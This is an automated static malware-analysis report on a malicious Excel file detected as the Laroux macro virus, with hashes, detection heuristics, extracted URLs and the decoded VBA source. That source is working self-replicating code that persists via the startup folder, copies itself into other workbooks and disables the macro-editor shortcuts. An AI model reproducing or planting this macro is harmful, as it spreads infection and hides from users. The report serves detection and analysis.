Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 508d51dfd16fe01a…

MALICIOUS

Office (OLE)

43.5 KB Created: 2013-03-01 01:27:13 Authoring application: Microsoft Excel First seen: 2015-09-24
MD5: 6786d31cb88ac3fcbfc34a5bba927d00 SHA-1: 64486000e02492a67373c81d928d7cfa5307bb5b SHA-256: 508d51dfd16fe01aec8066b7d0b2099faabd0862bedfd28e0f1621175619be95
90 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The critical ClamAV heuristic and the presence of VBA macros indicate malicious intent. The `auto_open` macro attempts to copy the malicious Excel file to the user's startup directory as 'StartUp.xls', likely to achieve persistence. It also hooks Excel's sheet activation and keyboard shortcuts, which could be used to trigger further malicious actions.

Heuristics 4

  • ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://blog.sina.com.cn/u/1461693000http://weibo.com/u/1461693000 In document text (OLE body)
    • http://blog.sohu.com/people/!NjZkYzRiOTE1MjU0NDFjZkBmb2N1cy5jbg==In document text (OLE body)
    • http://weibo.com/baini0718In document text (OLE body)
    • http://weibo.com/u/1461693000In document text (OLE body)
    • http://blog.sina.com.cn/u/1461693000In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1281 bytes
SHA-256: 45be63b7afdef07cea653a6397db04b98f27a7662ebaa5bedb439d9f593637fe
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
'Application.ScreenUpdating = True
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
'ActiveWindow.Visible = True
Workbooks("StartUp.xls").Save
'Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
Attribute cop.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
'Application.ScreenUpdating = True
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
'Sheets(n$).Select
End If
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True